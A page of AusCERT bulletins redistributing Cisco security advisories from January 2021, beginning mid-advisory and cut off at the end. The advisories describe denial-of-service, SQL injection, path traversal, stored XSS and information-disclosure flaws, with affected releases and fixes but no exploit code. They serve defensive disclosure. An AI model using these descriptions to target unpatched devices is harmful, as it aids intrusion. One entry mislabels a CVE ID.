vulnerability is due to a memory leak that occurs during packet processing. An attacker could exploit this vulnerability by sending a series of crafted IPv4 packets through an affected device. A successful exploit could allow the attacker to exhaust the available memory and cause an unexpected restart of the npusim process, leading to a DoS condition on the affected device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asr-mem-leak-dos-MTWGHKk3 Affected Products o Vulnerable Products At the time of publication, this vulnerability affected the following Cisco products if they were running a release of Cisco StarOS earlier than Release 21.22.0 and had the Vector Packet Processing (VPP) feature enabled: ASR 5000 Series Aggregation Services Routers Virtualized Packet Core-Single Instance (VPC-SI) The VPP feature is disabled by default. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Determine the VPP Configuration To see if the VPP feature is enabled, use the show task table process vpp_main all command. If the command output lists the vpp_main process, the feature is enabled. The following is a sample output with the VPP feature enabled: [local]swch# show task table process vpp_main all task parent cpu facility inst pid pri node facility inst pid ---- ---------------------------------------------- ------------------------- 1/0 vpp_main 1005729 5729 0 all - 0 0 Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Workarounds o There are no workarounds that address this vulnerability. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, Cisco StarOS releases 21.22.0 and later contained the fix for this vulnerability. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o This vulnerability was found during internal security testing. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asr-mem-leak-dos-MTWGHKk3 Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYAkj+ONLKJtyKPYoAQh0ORAAm9ixdv7Uqkg0tCmHAyHwS/QqOegVL6qc /wgT6zLp2mDjf7bPero8vZutsQYXl9+BneLd9GJ4/8J912Hqg+A/TaXfyzc56+lT OmrRPtzR8f6zvtzudXGnTP/aEJdnOTFCvWXIWRaUy3aG4uPtXnJohPsjyyZ3WW6J uRDgZTHtCZdZqvmORZjjaVqvRqkd76MRYsKNziD79IclIsmzWk74G49P0oCZSM35 BqKdzpobxWXCeMd2OQE7z/bap0X5CTmMOFEsltOqPMNDEx16xYHim6vwKg+Fw13M BSTObzfuu36bdqGqi0B9HuUMFuM+sFMYJ/7KoLcU1SI6o7kilAtLzYAuJrcf78z9 yFuptFB1vXQARM9pPPrwBgQfGxUuvbEwa1vFoDOm892L0BrTqvmt/1L9U/0yzpC+ FgJ4St2P9UcUz6bVvd1Ffd9I1jnta/mCAAWtftjiin+SRJUTQqqyJKpFUpYGxz9N oDFXVIbf67xxiK0BGbVKcKZq26VIkTpELymJGWIkHLHw1bhwLEQCTVk5YRtqdGLE h8oUS5B6CFApE91px1AtDA8+0+V/53w/aKfYusr6Aygv+hMBVRvvdFft1dgOnJ7j dRxGvZRuPEIYojYPShtbCkGpXMVkE9r58vJTnzjqFHvhhWgz4fdqH+GKNGQ5Lmia MbEQfIS6OVo= =LZso -----END PGP SIGNATURE-----
AusCERT - Security Bulletins · 2021. január 21.

ESB-2021.0252 - [Cisco] Cisco Unified Communications Products: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0252 Cisco Unified Communications Products Vulnerabilities 21 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Cisco Unified Communications Products Publisher: Cisco Systems Operating System: Cisco Impact/Access: Access Confidential Data -- Existing Account Reduced Security -- Existing Account Resolution: Patch/Upgrade CVE Names: CVE-2021-1364 CVE-2021-1357 CVE-2021-1355 CVE-2021-1282 Original Bulletin: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-imp-trav-inj-dM687ZD6 - --------------------------BEGIN INCLUDED TEXT-------------------- Cisco Unified Communications Products Vulnerabilities Priority: Medium Advisory ID: cisco-sa-imp-trav-inj-dM687ZD6 First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvv20974 CSCvv20985 CSCvv62642 CSCvv62648 CVE Names: CVE-2021-1282 CVE-2021-1355 CVE-2021-1357 CVE-2021-1364 CWEs: CWE-35 CWE-89 Summary o Multiple vulnerabilities in Cisco Unified Communications Manager IM & Presence Service (Unified CM IM&P) could allow an attacker to conduct path traversal attacks and SQL injection attacks on an affected system. One of the SQL injection vulnerabilities that affects Unified CM IM&P also affects Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) and could allow an attacker to conduct SQL injection attacks on an affected system. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-imp-trav-inj-dM687ZD6 Affected Products o Vulnerable Products At the time of publication, these vulnerabilities affected the following Cisco products: Unified CM Unified CM IM&P Unified CM SME For information about which Cisco software releases are vulnerable, see the Fixed Software section of this advisory. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by these vulnerabilities. Details o The vulnerabilities are not dependent on one another. Exploitation of one of the vulnerabilities is not required to exploit another vulnerability. In addition, a software release that is affected by one of the vulnerabilities may not be affected by the other vulnerabilities. Details about the vulnerabilities are as follows. CVE-2021-1357: Cisco Unified Communications Manager IM & Presence Service Path Traversal Vulnerability A vulnerability in the web-based management interface of Cisco Unified CM IM&P could allow an authenticated, remote attacker to conduct path traversal attacks and obtain read access to sensitive files on an affected system. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request that contains directory traversal character sequences to an affected system. A successful exploit could allow the attacker to read files on the underlying operating system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCvv20985 CVE ID: CVE-2021-1357 Security Impact Rating (SIR): Medium CVSS Base Score: 6.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N CVE-2021-1355: Cisco Unified Communications Manager IM & Presence Service SQL Injection Vulnerability A vulnerability in the web-based management interface of Cisco Unified CM IM&P could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. The vulnerability is due to improper validation of user-submitted parameters. An attacker could exploit this vulnerability by authenticating to the application and sending malicious requests to an affected system. A successful exploit could allow the attacker to obtain data that is stored in the underlying database, including hashed user credentials. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCvv20974 CVE ID: CVE-2021-1355 Security Impact Rating (SIR): Medium CVSS Base Score: 6.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N CVE-2021-1364: Cisco Unified Communications Manager IM & Presence Service SQL Injection Vulnerability A vulnerability in the web-based management interface of Cisco Unified CM IM&P could allow an authenticated, remote attacker with administrative credentials to conduct SQL injection attacks on an affected system. The vulnerability is due to improper validation of user-submitted parameters. An attacker could exploit this vulnerability by authenticating to the application and sending malicious requests to an affected system. A successful exploit could allow the attacker to obtain data that is stored in the underlying database. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCvv62648 CVE ID: CVE-2021-1364 Security Impact Rating (SIR): Medium CVSS Base Score: 4.9 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N CVE-2021-1282: Cisco Unified Communications Manager SQL Injection Vulnerability A vulnerability in the web-based management interface of Cisco Unified CM and Cisco Unified CM SME could allow an authenticated, remote attacker with administrative credentials to conduct SQL injection attacks on an affected system. The vulnerability is due to improper validation of user-submitted parameters. An attacker could exploit this vulnerability by authenticating to the application and sending malicious requests to an affected system. A successful exploit could allow the attacker to obtain data that is stored in the underlying database. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCvv62642 CVE ID: CVE-2021-1364 Security Impact Rating (SIR): Medium CVSS Base Score: 4.9 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N Workarounds o There are no workarounds that address these vulnerabilities. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, the release information in the following table (s) was accurate. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. The left column lists Cisco software releases, and the right column indicates whether a release was affected by the vulnerabilities described in this advisory and which release included the fix for these vulnerabilities. Unified IM&P Cisco Unified Communications Manager IM & First Fixed Release for These Presence Service Releases Vulnerabilities Earlier than 10.5 Migrate to a fixed release. 10.5 Migrate to a fixed release. 11.0 Migrate to a fixed release. 11.5 11.5(1)SU9 12.0 Migrate to a fixed release. 12.5 12.5(1)SU4 (March 2021) Unified CM and Unified CM SME Cisco Unified Communications Manager and Cisco First Fixed Release for Unified Communications Manager SME Releases These Vulnerabilities Earlier than 10.5 Migrate to a fixed release. 10.5 Migrate to a fixed release. 11.0 Migrate to a fixed release. 11.5 11.5(1)SU9 12.0 12.0(1)SU4 12.5 12.5(1)SU4 (March 2021) Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory. Source o Cisco would like to thank Mostafa Soliman of IBM X-Force Red for reporting these vulnerabilities. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-imp-trav-inj-dM687ZD6 Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYAkjseNLKJtyKPYoAQjHGg/+PMfLepXx1R6of2TkqccQdGtBFeZUl+M+ VB3nXaFgC+oEdLtdH/x5XESUyuTMqfuxEpDzn7AmYROeXZxbsOp+x+s9xXHIS27m bgDxpBVlW9P+QNB7xVWyMDb93QzhDXfuxpX90Wk7HZ7r4kgdVrDBqTJ2XqLXTChm pNCwErLoXRF8NCe8i4R8X/O9jbtba1cYKvmSYNpNHVGlORygDF5ykXGIBlhSF6pN 3iFcSVEiVBiEFpAFYpNpn45D//aNc1pqSqXHAkGWSkGu+GB5XTrWafc3LbJUirav UDPInP5wChiM890TmjT0c+NHIRvdDP/pdHxBP/f0OJBzNanxc83z20jthL1tat8t 9WCyGbqKJMJjduCTF3vtJAwh9WVj19TBKVqy8qc6W5dOJLow+jrdBSwcUgoz9YZI K0yi3rjYKFhNj6oUYcSAlk0LT5Cx4xGE0csDU6THNB9zc8Zv/NxOipuOGLqvwG1K MOUKi5tndPNX4+HDDuQ0Obdo6WF9+r0NVWR7uFgESZgn5ziCPDtpjsv1mTyOCdjX 4iNlHJtY+RbmlYVMWs90s63JtxBg5RbTXZH/eH4gmrqIP6ur5h5smDHZLJLyKG25 Fa75NZ4iP42oFEwrZlt9yLcVajM/ASZ9Lb2xLvZe+eQxTsR98rM4a4bJTs4eDPCx z2vx7Q1Ev/4= =fSNG -----END PGP SIGNATURE-----
AusCERT - Security Bulletins · 2021. január 21.

ESB-2021.0251 - [Cisco] Cisco Umbrella Dashboard: Reduced security - Remote/unauthenticated

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0251 Cisco Umbrella Dashboard Packet Flood Vulnerability 21 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Cisco Umbrella Dashboard Publisher: Cisco Systems Operating System: Cisco Impact/Access: Reduced Security -- Remote/Unauthenticated Resolution: None CVE Names: CVE-2021-1350 Original Bulletin: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-umb-dos-dgKzDEBP - --------------------------BEGIN INCLUDED TEXT-------------------- Cisco Umbrella Dashboard Packet Flood Vulnerability Priority: Medium Advisory ID: cisco-sa-umb-dos-dgKzDEBP First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvw61612 CVE Names: CVE-2021-1350 CWEs: CWE-770 Summary o A vulnerability in the web UI of Cisco Umbrella could allow an unauthenticated, remote attacker to negatively affect the performance of this service. The vulnerability exists due to insufficient rate limiting controls in the web UI. An attacker could exploit this vulnerability by sending crafted HTTPS packets at a high and sustained rate. A successful exploit could allow the attacker to negatively affect the performance of the web UI. Cisco has addressed this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-umb-dos-dgKzDEBP Affected Products o Vulnerable Products This vulnerability affects Cisco Umbrella, which is cloud based. No user action is required. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Workarounds o There are no workarounds that address this vulnerability. Fixed Software o Cisco has addressed this vulnerability in Cisco Umbrella Dashboard, which is cloud based. No user action is required. Customers who need additional information are advised to contact Cisco Umbrella Support at umbrella-support@cisco.com or their contracted maintenance providers. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o Cisco would like to thank Abhinav Khanna of eSec Forte Technologies for reporting this vulnerability. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-umb-dos-dgKzDEBP Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYAkjj+NLKJtyKPYoAQglGg/6Am9lNh5z6SJP3trEaAsjJFwVkL6sYJvm GhOreEkjq5pMzmQwy8x8vv46k2kgcqLskeC87pRsLV+hpumstkr7ZvvpldS9h/qR RHRoh1y8+KyBF1T2JvHfqPLXlq1yq8uJTNv20JPBDjSscmO3a2hHQvzHTtDHTsmT FLj4ZDdPitdgCZJwLyjbQHd5gosxWWSaImN+9HR7NKl0/RILmEXGfOH+SLMt52/d lI+Wy2DEdCkJPKbkD5FwvhjarcvkAbe9yLbkkQWg+MD7J87Hw7BIs4HrhA/mYa1k KcoJZuRZraFU7yP3G5fZ9KZSEBX4I4F3AxG/WhDvZTjxlrhzJ8RC4oQgnxgQ1sMl mlo12c/1E/ZIWN7E3YWaWjTDRMEKvenXFIiZbp9lbY5h8MPYZKAcskzbffZ1R3mT 3cvgFhRr6WmVESPR3k6mlePYbAnOv1nmrMIuaRgAodEgH590LYGS4dRIyKAKvIas OZwraKA0FnLGzo718Y5hBNDYlvQDA3h1jIGsh6ZtYWAzBhtYtk4BjwX89F2rZ9e/ HDWJOgqZ+hbhSu4UjPePiyQRJVClwh6zObLT2+gLoMZ3p8GXfAHduIv+SKE7FsGn fth/F1jRnIoYIOsQuEulj8PScIetmfgmBWJb3P7VvuREzV5/zNmhV/Cfx1IzGRas zPlluMtUFCM= =tKD5 -----END PGP SIGNATURE-----
AusCERT - Security Bulletins · 2021. január 21.

ESB-2021.0250 - [Cisco] Cisco Web Security Appliance: Cross-site scripting - Existing account

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0250 Cisco Web Security Appliance Stored Cross-Site Scripting Vulnerability 21 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Cisco Web Security Appliance Publisher: Cisco Systems Operating System: Cisco Impact/Access: Cross-site Scripting -- Existing Account Resolution: Patch/Upgrade CVE Names: CVE-2021-1271 Original Bulletin: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wsa-xss-RuB5WGqL - --------------------------BEGIN INCLUDED TEXT-------------------- Cisco Web Security Appliance Stored Cross-Site Scripting Vulnerability Priority: Medium Advisory ID: cisco-sa-wsa-xss-RuB5WGqL First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvu22019 CSCvv27761 CVE Names: CVE-2021-1271 CWEs: CWE-79 Summary o A vulnerability in the web-based management interface of Cisco AsyncOS for Cisco Web Security Appliance (WSA) could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface of an affected device. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by inserting malicious data into a specific data field in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wsa-xss-RuB5WGqL Affected Products o Vulnerable Products At the time of publication, this vulnerability affected Cisco WSA releases earlier than Release 12.5.1. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Workarounds o There are no workarounds that address this vulnerability. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, Cisco WSA releases 12.5.1 and later contained the fix for this vulnerability. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o This vulnerability was found by Alvaro Gutierrez of Cisco during internal security testing. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. Related to This Advisory o Cross-Site Scripting URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wsa-xss-RuB5WGqL Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYAkjcONLKJtyKPYoAQhFKA/+NivaZklBfTmTP9kxDpHL9uecDlCRXbwN 4a8g26Dkcg5ZFpj2fmJT2TvbzIvqJ1d0aOk4IMmbBYE3bMLAlrkK+Rt8XMQVXxVS +K8h18dNOmMLKV9dzqXMehU42v8cRy0rxJlArA8/1kNskyIJmRnqSuq5Od2sCp0L Q0+FRUOQc/fzQEQxA6x+ocJxGv0Zbja9mYdB5KWuWH85WbRGCp5Gf6iPpuFpB11P lh5xGsgj9MQTOVZnibv+9THAvq5BTNWRReqA55NhXYrn0eOTGLTDLIhG79TA/gp7 40ZXwV+zVAlTJfDAho1eZfzqb923Unhfievt4Nr0xplAvtwCySA6re1nsuXH+kfk CShofeHpeWbBX9VlrGVXFBL50mXLde4GuhoJ39VX7q2PUu9OA4lBW1RgMRQ+f9qP i2YWERe6l2N+WEKGL71ijZir0Aho6guckMjPeGLKqeBcvOHMDJdRRMaJUq08RDZc w0bWXubkatoj0sz5n5fm/Q6nhjq8mtTJiS4ffc2yIy8OYil/0IdQN2hvg9X/yzWK pOgbawFW/vO5Hz6QX2SqZKWqq+78cx7gOM8mYSkBhZU48tEDAy+Mnd5w8p6uFFW2 qbQgQp9Fd72BT+V092rVn7vFP/CvoqM/NtSjyDq/FPF5mZHIfwnEbX4CyEqOe9ke 5Xr4LvT17To= =Dx6C -----END PGP SIGNATURE-----
AusCERT - Security Bulletins · 2021. január 21.

ESB-2021.0249 - [Cisco] Cisco ESA, SMA and WSA products: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0249 Cisco Email Security Appliance, Cisco Content Security Management Appliance, and Cisco Web Security Appliance Information Disclosure Vulnerability 21 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Cisco Email Security Appliance (ESA) Cisco Content Security Management Appliance (SMA) Cisco Web Security Appliance (WSA) Publisher: Cisco Systems Operating System: Cisco Impact/Access: Access Confidential Data -- Remote/Unauthenticated Unauthorised Access -- Remote/Unauthenticated Resolution: Patch/Upgrade CVE Names: CVE-2021-1129 Original Bulletin: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-wsa-sma-info-RHp44vAC - --------------------------BEGIN INCLUDED TEXT-------------------- Cisco Email Security Appliance, Cisco Content Security Management Appliance, and Cisco Web Security Appliance Information Disclosure Vulnerability Priority: Medium Advisory ID: cisco-sa-esa-wsa-sma-info-RHp44vAC First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvu89555 CSCvu93199 CSCvu93201 CVE Names: CVE-2021-1129 CWEs: CWE-201 Summary o A vulnerability in the authentication for the general purpose APIs implementation of Cisco Email Security Appliance (ESA), Cisco Content Security Management Appliance (SMA), and Cisco Web Security Appliance (WSA) could allow an unauthenticated, remote attacker to access general system information and certain configuration information from an affected device. The vulnerability exists because a secure authentication token is not required when authenticating to the general purpose API. An attacker could exploit this vulnerability by sending a crafted request for information to the general purpose API on an affected device. A successful exploit could allow the attacker to obtain system and configuration information from the affected device, resulting in an unauthorized information disclosure. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-wsa-sma-info-RHp44vAC Affected Products o Vulnerable Products At the time of publication, this vulnerability affected Cisco ESA, Cisco SMA, and Cisco WSA if they supported general purpose API and the release was earlier than the first fixed release. The general purpose API was first supported in the following Cisco software releases: ESA Release 13.0 SMA Release 12.5 WSA Release 11.8 See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Details o The general purpose API and the information obtained by this API are described in the General Purpose APIs chapter of the AsyncOS 13.0 API for Cisco Email Security Appliances Getting Started Guide . Workarounds o There are no workarounds that address this vulnerability. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, the following Cisco software releases contained the fix for this vulnerability: ESA releases 13.5.2 and later SMA releases 13.8.0 and later WSA releases 12.5.1 and later See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o This vulnerability was found during internal security testing. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the 